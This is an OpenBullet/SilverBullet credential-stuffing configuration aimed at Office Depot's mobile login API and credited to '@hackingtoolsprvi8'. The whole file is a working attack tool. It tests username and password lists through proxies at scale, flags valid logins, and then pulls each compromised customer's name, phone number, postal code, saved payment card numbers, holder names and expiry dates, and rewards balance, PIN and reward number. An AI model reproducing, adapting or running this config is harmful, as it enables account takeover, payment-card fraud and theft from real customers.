[SETTINGS]
{
  "Name": "Office Depot(@hackingtoolsprvi8)",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2022-05-26T02:03:28.898282+04:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@hackingtoolsprvi8",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Officedepot-V2-Hagasoo",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#Post_Data REQUEST POST "https://www.officedepot.com/mobile/loginApp.do" 
  CONTENT "autoLogin=true&loginName=<USER>&password=<PASS>&pushToken=rb1__35wQAmjrmFlnBsL-A&store_detail=G5He9WJ3zih6z9g0u%2BcyyBUiHFPcTRxhowXJwf1Uhy879i%2BpS%2FpmSWoOzKznyjMq%2B34irnRo%2B7zC%0AMp4FTE%2BItRUZCDP8h98I8UYOgBYDzeKUJLjVOW2NIQV8lfTaeuiA0pzEDf7yqNw4hG5jygOaerOC%0APs%2F6Wz9NcYTDFkzWa5FIUJpkXoUS3STZC4Ta4MmPBYBuiDuaymjad2Ks0ymNNRO3BiVNEEZFzEDu%0AkrgY%2FyiOfOb6Ifu2qBVrf3kuBD1FdmD4zn%2B7boz02cXowwtc%2B6I6%2BNRA51rfKIUOz%2F7B7e7uPnvf%0A2zxSMRN2LpBLSSpi0qzCl5ui5oLiN5qMTIqIJg%3D%3D%0A" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/vnd.3210c3cdm9+json; version=2.0" 
  HEADER "Accept-Language: en;q=1" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Pragma: no-cache" 
  HEADER "User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G9508 Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.136 Mobile Safari/537.36" 
  HEADER "Referrer: https://www.officedepot.com/?isMobileApp=true" 
  HEADER "Storeid: 9078412ad9019381" 
  HEADER "Content-Type: applicat" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Sorry, either your Login Name or Password is invalid. Please try again." 
  KEYCHAIN Success OR 
    KEY "accessToken\":\"" 

#FullName PARSE "<SOURCE>" JSON "fullName" CreateEmpty=FALSE -> CAP "FullName" 

#PostalCode PARSE "<SOURCE>" JSON "postalCode" CreateEmpty=FALSE -> CAP "PostalCode" 

#Phone PARSE "<SOURCE>" JSON "phoneNumber" CreateEmpty=FALSE -> CAP "Phone" 

#loyalyPilotCustomer PARSE "<SOURCE>" JSON "loyalyPilotCustomer" CreateEmpty=FALSE -> CAP "loyalyPilotCustomer" 

#Post_Orders REQUEST POST "https://www.officedepot.com/mobile/account/number.do" 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/vnd.3210c3cdm9+json; version=2.0" 
  HEADER "connection: keep-alive" 
  HEADER "accept-language: en;q=1" 
  HEADER "pragma: no-cache" 
  HEADER "host: www.officedepot.com" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 7.1.2; SM-G975N Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.70 Mobile Safari/537.36" 
  HEADER "referrer: https://www.officedepot.com/?isMobileApp=true" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 

#pendingOrderNumber PARSE "<SOURCE>" JSON "pendingOrderNumber" CreateEmpty=FALSE -> CAP "pendingOrderNumber" 

REQUEST POST "https://www.officedepot.com/mobile/orderHistoryList.do" 
  CONTENT "includePos=true&pageIndex=T&pageNumber=0&orderStatus=&searchValue=&searchByDollarMin=&searchByDollarMax=&searchByPendingAprrover=&searchFromDate=&searchToDate=&searchType=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/vnd.3210c3cdm9+json; version=2.0" 
  HEADER "connection: keep-alive" 
  HEADER "accept-language: en;q=1" 
  HEADER "pragma: no-cache" 
  HEADER "host: www.officedepot.com" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 7.1.2; SM-G975N Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.70 Mobile Safari/537.36" 
  HEADER "referrer: https://www.officedepot.com/?isMobileApp=true" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 

#TotalOrderCount PARSE "<SOURCE>" JSON "totalOrderCount" CreateEmpty=FALSE -> CAP "TotalOrderCount" 

#Post_Payment REQUEST POST "https://www.officedepot.com/mobile/tenderList.do" 
  CONTENT "pageIndex=1&checkoutProcess=false" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "accept: application/vnd.3210c3cdm9+json; version=2.0" 
  HEADER "connection: keep-alive" 
  HEADER "accept-language: en;q=1" 
  HEADER "pragma: no-cache" 
  HEADER "host: www.officedepot.com" 
  HEADER "user-agent: Mozilla/5.0 (Linux; Android 7.1.2; SM-G975N Build/N2G47H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/68.0.3440.70 Mobile Safari/537.36" 
  HEADER "referrer: https://www.officedepot.com/?isMobileApp=true" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 

#TotalCC PARSE "<SOURCE>" JSON "totalCount" CreateEmpty=FALSE -> CAP "TotalCC" 

#CardType PARSE "<SOURCE>" JSON "cardType" Recursive=TRUE CreateEmpty=FALSE -> CAP "CardType" 

#CardNumber PARSE "<SOURCE>" JSON "cardNumber" Recursive=TRUE CreateEmpty=FALSE -> CAP "CardNumber" 

#CardHolderName PARSE "<SOURCE>" JSON "cardHolderName" Recursive=TRUE CreateEmpty=FALSE -> CAP "CardHolderName" 

#ExpDate PARSE "<SOURCE>" JSON "expDate" Recursive=TRUE CreateEmpty=FALSE -> CAP "ExpDate" 

#CvvRequired PARSE "<SOURCE>" JSON "cvvRequired" Recursive=TRUE CreateEmpty=FALSE -> CAP "CvvRequired" 

FUNCTION CurrentUnixTime -> VAR "A" 

PARSE "<COOKIES(JSESSIONID)>" LR "" "" -> VAR "B" 

REQUEST GET "https://www.officedepot.com/mobile/loyalty/getRewards.do;jsessionid=<B>?_=<A>" 
  
  HEADER "accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: nl-NL,nl;q=0.9" 
  HEADER "referer: https://www.officedepot.com/a/loyalty-programs/office-depot-rewards/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36" 
  HEADER "x-requested-with: XMLHttpRequest" 

#Rewards-Amount PARSE "<SOURCE>" LR "totalAvailableRewards\":" ",\"" CreateEmpty=FALSE -> CAP "Rewards-Amount(Balance)" 

#Rewards-expirationDate PARSE "<SOURCE>" JSON "expirationDate" CreateEmpty=FALSE -> CAP "Rewards-expirationDate" 

#Pin PARSE "<SOURCE>" JSON "pin" CreateEmpty=FALSE -> CAP "Pin" 

#FullRewardNumber PARSE "<SOURCE>" JSON "fullRewardNumber" CreateEmpty=FALSE -> CAP "FullRewardNumber" 

#FUNCTION FUNCTION Constant "@hackingtoolsprvi8" -> CAP "Config By" 

